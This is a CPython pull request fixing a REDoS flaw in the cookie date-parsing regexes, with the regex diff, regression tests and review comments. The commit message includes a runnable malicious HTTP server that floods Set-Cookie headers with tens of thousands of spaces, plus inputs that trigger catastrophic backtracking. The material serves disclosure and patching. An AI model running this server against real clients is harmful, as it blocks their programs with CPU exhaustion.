[2.7] bpo-38804: Fix REDoS in http.cookiejar (GH-17157) by vstinner · Pull Request #17345 · python/cpython

[2.7] bpo-38804: Fix REDoS in http.cookiejar (GH-17157) #17345

Merged: 1 commit, Nov 24, 2019
bpo-38804: Fix REDoS in http.cookiejar (GH-17157)
The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS).

LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
to parse Set-Cookie headers returned by a server.
Processing a response from a malicious HTTP server can lead to extreme
CPU usage and execution will be blocked for a long time.

The regex contained multiple overlapping \s* terms, separated only by
optional groups. Ignoring the ?-optional capture groups, the regex could
be simplified to

    \d+-\w+-\d+(\s*\s*\s*)$

Therefore, a long sequence of spaces can trigger bad performance.

Matching a malicious string such as

    LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")

caused catastrophic backtracking.

The fix removes ambiguity about which \s* should match a particular
space.
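
The effect of that change can be sketched with two cut-down patterns. Both are assumptions made for illustration, modelled on the simplified regex above rather than copied from LOOSE_HTTP_DATE_RE: AMBIGUOUS keeps three \s* terms separated only by optional groups, while UNAMBIGUOUS moves each trailing \s* inside the optional group it follows. time_match is a hypothetical helper name.

```python
import re
import time

# Illustrative only: cut-down patterns, not the real LOOSE_HTTP_DATE_RE.
# Three \s* terms separated by optional groups: a run of spaces can be
# divided between them in many ways.
AMBIGUOUS = re.compile(r"\d+-\w+-\d+\s*([A-Za-z]+)?\s*(?:\(\w+\))?\s*$")

# Each later \s* may only match after a mandatory token, so a run of spaces
# directly after the date can only belong to the first \s*.
UNAMBIGUOUS = re.compile(r"\d+-\w+-\d+\s*(?:([A-Za-z]+)\s*)?(?:\(\w+\)\s*)?$")


def time_match(pattern, n_spaces):
    """Return (match_or_None, seconds) for a string that can never match."""
    text = "1-c-1" + " " * n_spaces + "!"
    start = time.perf_counter()
    result = pattern.match(text)
    return result, time.perf_counter() - start


if __name__ == "__main__":
    # Keep n small: the ambiguous pattern is expected to slow down sharply.
    for n in (50, 100, 200):
        _, slow = time_match(AMBIGUOUS, n)
        _, fast = time_match(UNAMBIGUOUS, n)
        print(f"{n} spaces: ambiguous {slow:.6f}s, unambiguous {fast:.6f}s")
```

Both patterns accept the same strings; only the amount of backtracking on a failing input differs.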

A malicious server can respond with Set-Cookie headers that attack any
Python program which accesses it, e.g.

    from http.server import BaseHTTPRequestHandler, HTTPServer

    def make_set_cookie_value(n_spaces):
        spaces = " " * n_spaces
        expiry = f"1-c-1{spaces}!"
        return f"b;Expires={expiry}"

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.log_request(204)
            self.send_response_only(204)  # Don't bother sending Server and Date
            n_spaces = (
                int(self.path[1:])  # Can GET e.g. /100 to test shorter sequences
                if len(self.path) > 1 else
                65506  # Max header line length 65536
            )
            value = make_set_cookie_value(n_spaces)
            for i in range(99):  # Not necessary, but we can have up to 100 header lines
                self.send_header("Set-Cookie", value)
            self.end_headers()

    if __name__ == "__main__":
        HTTPServer(("", 44020), Handler).serve_forever()

This server returns 99 Set-Cookie headers. Each has 65506 spaces.
Extracting the cookies will pretty much never complete.

Vulnerable client using the example at the bottom of
https://docs.python.org/3/library/http.cookiejar.html :

    import http.cookiejar, urllib.request
    cj = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
    r = opener.open("http://localhost:44020/")

The popular requests library was also vulnerable without any additional
options (as it uses http.cookiejar by default):

    import requests
    requests.get("http://localhost:44020/")

* Regression test for http.cookiejar REDoS

If we regress, this test will take a very long time.

* Improve performance of http.cookiejar.ISO_DATE_RE

A string like

    "444444" + (" " * 2000) + "A"

could cause poor performance due to the 2 overlapping \s* groups,
although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.
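
A rough way to see why two overlapping \s* terms are less serious than three is to count how many length assignments a backtracking matcher may try before giving up. The model below is an assumption for illustration (it ignores any engine optimisations, and count_attempts and brute_force are hypothetical names): each of k adjacent \s* terms picks a length, and every combination whose total does not exceed the n available spaces counts as one attempt. It needs Python 3.8 or later for math.comb.

```python
from itertools import product
from math import comb


def count_attempts(n_spaces, k_terms):
    """Number of ways k greedy terms can claim at most n spaces in total."""
    # Stars and bars: k non-negative lengths plus one slack value sum to n.
    return comb(n_spaces + k_terms, k_terms)


def brute_force(n_spaces, k_terms):
    """Same count by enumeration, usable only for small inputs."""
    lengths = range(n_spaces + 1)
    return sum(1 for combo in product(lengths, repeat=k_terms)
               if sum(combo) <= n_spaces)


if __name__ == "__main__":
    for k in (1, 2, 3):
        print(k, "term(s):", count_attempts(2000, k))
```

Under this model the count grows quadratically for two terms and cubically for three, which matches the complexity classes named in the regression test comments.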

(cherry picked from commit 1b779bf)
bcaller authored and vstinner committed Nov 22, 2019
commit 0b985cd152f21c5417e2b4695e92b950919eaceb
20 changes: 13 additions & 7 deletions Lib/cookielib.py
@@ -205,10 +205,14 @@ def _str2time(day, mon, yr, hr, min, sec, tz):
        (?::(\d\d))? # optional seconds
     )? # optional clock
        \s*
-    ([-+]?\d{2,4}|(?![APap][Mm]\b)[A-Za-z]+)? # timezone
+    (?:
+       ([-+]?\d{2,4}|(?![APap][Mm]\b)[A-Za-z]+) # timezone
+       \s*
+    )?
+    (?:
+       \(\w+\) # ASCII representation of timezone in parens.
        \s*
-    (?:\(\w+\))? # ASCII representation of timezone in parens.
-       \s*$""", re.X)
+    )?$""", re.X)
 def http2time(text):
     """Returns time in seconds since epoch of time represented by a string.

@@ -266,7 +270,7 @@ def http2time(text):
     return _str2time(day, mon, yr, hr, min, sec, tz)

 ISO_DATE_RE = re.compile(
-    """^
+    r"""^

Contributor:
Is there a reason that this r is needed specifically for python 2? I suppose it is preferred, but gives the same regex with or without (str(sre_parse.parse("""^... with and without give the same result).
Unrelated to this change, I just noticed that the backslash in [-\/] doesn't do anything. Not sure why it's there.

Contributor:
Oh I see the r wasn't in the python2 branch.

Member Author:
So.... adding the r is correct, right?

Contributor:
yes. Ignore me.

     (\d{4}) # year
        [-\/]?
     (\d\d?) # numerical month
@@ -278,9 +282,11 @@ def http2time(text):
        (?::?(\d\d(?:\.\d*)?))? # optional seconds (and fractional)
     )? # optional clock
        \s*
-    ([-+]?\d\d?:?(:?\d\d)?
-     |Z|z)? # timezone (Z is "zero meridian", i.e. GMT)
-       \s*$""", re.X)
+    (?:
+       ([-+]?\d\d?:?(:?\d\d)?
+        |Z|z) # timezone (Z is "zero meridian", i.e. GMT)
+       \s*
+    )?$""", re.X)
 def iso2time(text):
     """
     As for http2time, but parses the ISO 8601 formats:
15 changes: 14 additions & 1 deletion Lib/test/test_cookielib.py
@@ -6,7 +6,7 @@
 import re
 import time

-from cookielib import http2time, time2isoz, time2netscape
+from cookielib import http2time, time2isoz, iso2time, time2netscape
 from unittest import TestCase

 from test import test_support
@@ -117,6 +117,19 @@ def test_http2time_garbage(self):
                 "http2time(test) %s" % (test, http2time(test))
                 )

+    def test_http2time_redos_regression_actually_completes(self):
+        # LOOSE_HTTP_DATE_RE was vulnerable to malicious input which caused catastrophic backtracking (REDoS).
+        # If we regress to cubic complexity, this test will take a very long time to succeed.
+        # If fixed, it should complete within a fraction of a second.
+        http2time("01 Jan 1970{}00:00:00 GMT!".format(" " * 10 ** 5))
+        http2time("01 Jan 1970 00:00:00{}GMT!".format(" " * 10 ** 5))
+
+    def test_iso2time_performance_regression(self):
+        # If ISO_DATE_RE regresses to quadratic complexity, this test will take a very long time to succeed.
+        # If fixed, it should complete within a fraction of a second.
+        iso2time('1994-02-03{}14:15:29 -0100!'.format(' '*10**6))
+        iso2time('1994-02-03 14:15:29{}-0100!'.format(' '*10**6))
+

 class HeaderTests(TestCase):

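
The same checks can be sketched against the Python 3 module, where these functions live in http.cookiejar instead of cookielib. This assumes an interpreter that already contains the fix; on an unpatched one the calls below may run for a very long time. The space count is reduced from the test's values to keep the sketch quick, and check_inputs_rejected is a hypothetical helper name.

```python
from http.cookiejar import http2time, iso2time

# Smaller than the 10**5 and 10**6 used in the regression tests above.
N_SPACES = 10 ** 4


def check_inputs_rejected(n_spaces=N_SPACES):
    """Feed the regression-test inputs to the parsers and collect results."""
    pad = " " * n_spaces
    return [
        http2time("01 Jan 1970{}00:00:00 GMT!".format(pad)),
        http2time("01 Jan 1970 00:00:00{}GMT!".format(pad)),
        iso2time("1994-02-03{}14:15:29 -0100!".format(pad)),
        iso2time("1994-02-03 14:15:29{}-0100!".format(pad)),
    ]


if __name__ == "__main__":
    # The trailing "!" makes every input invalid, so each parser call is
    # expected to give up and return None.
    print(check_inputs_rejected())
```

Like the tests in the diff, the sketch has no explicit time limit: a regression shows up as a run that does not finish in reasonable time.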
1 change: 1 addition & 0 deletions Misc/ACKS
@@ -210,6 +210,7 @@ Ralph Butler
 Zach Byrne
 Nicolas Cadou
 Jp Calderone
+Ben Caller
 Arnaud Calmettes
 Daniel Calvelo
 Tony Campbell

@@ -0,0 +1 @@
+Fixes a ReDoS vulnerability in :mod:`http.cookiejar`. Patch by Ben Caller.